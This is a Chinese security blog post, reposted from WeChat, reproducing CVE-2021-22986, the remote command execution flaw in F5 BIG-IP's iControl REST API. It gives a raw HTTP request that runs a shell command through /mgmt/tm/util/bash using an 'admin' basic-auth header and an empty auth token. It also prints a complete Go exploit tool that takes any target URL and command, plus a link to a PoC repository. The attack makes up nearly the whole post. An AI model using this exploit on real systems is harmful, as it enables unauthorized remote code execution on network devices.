CVE-2021-22986 复现

  • A+
所属分类:安全文章

复现

数据包如下:

 POST /mgmt/tm/util/bash HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
 Accept: */*
 Connection: close
 Authorization: Basic YWRtaW46
 X-F5-Auth-Token:
 Content-Length: 46
 Content-Type: application/json
 
 {"command": "run", "utilCmdArgs": "-c id"}

CVE-2021-22986 复现


工具

使用 go 简单写一下,代码有点 low

下载地址:https://github.com/yuyan-sec/Poc-Project/tree/main/F5

CVE-2021-22986 复现

相关代码:

package main
import ( "fmt" "net/http" "io/ioutil" "crypto/tls" "time" "bytes" "regexp" "strings" "flag")
func main(){
var host,cmd string flag.StringVar(&host,"u","","URL: http://127.0.0.1") flag.StringVar(&cmd,"c","","CMD: id") flag.Parse() if host == "" || cmd == ""{ fmt.Println(`███████╗███████╗ ██████╗ ██████╗███████╗██╔════╝██╔════╝ ██╔══██╗██╔════╝██╔════╝█████╗ ███████╗ ██████╔╝██║ █████╗ ██╔══╝ ╚════██║ ██╔══██╗██║ ██╔══╝ ██║ ███████║ ██║ ██║╚██████╗███████╗╚═╝ ╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ CVE-2021-22986 Author: @yuyan-sec`) }else{ exp(host,cmd) }
}
func exp(url, cmd string){ t := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } c := &http.Client{ Transport: t, Timeout: 5 * time.Second, }
url = strings.TrimRight(url,"/") url = url + "/mgmt/tm/util/bash"
payload := []byte("{"command": "run", "utilCmdArgs": "-c "+ cmd +""}")
r, err := http.NewRequest("POST", url, bytes.NewBuffer(payload)) r.Header.Set("Content-Type", "application/json") r.Header.Set("X-F5-Auth-Token", "") r.Header.Set("Authorization", "Basic YWRtaW46")
resp, err := c.Do(r) if err != nil{ return }
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body) if err != nil{ return }
if resp.StatusCode == 200{ reg := regexp.MustCompile(`"commandResult":"(.*?)\n`) commandResult := reg.FindAllStringSubmatch(string(body),-1) result := commandResult[0][1] result = strings.Replace(result,"context=system_u:system_r:initrc_t:s0","",-1)
fmt.Println(result) }else{ fmt.Println("fail") }
}


本文始发于微信公众号(T9Sec):CVE-2021-22986 复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: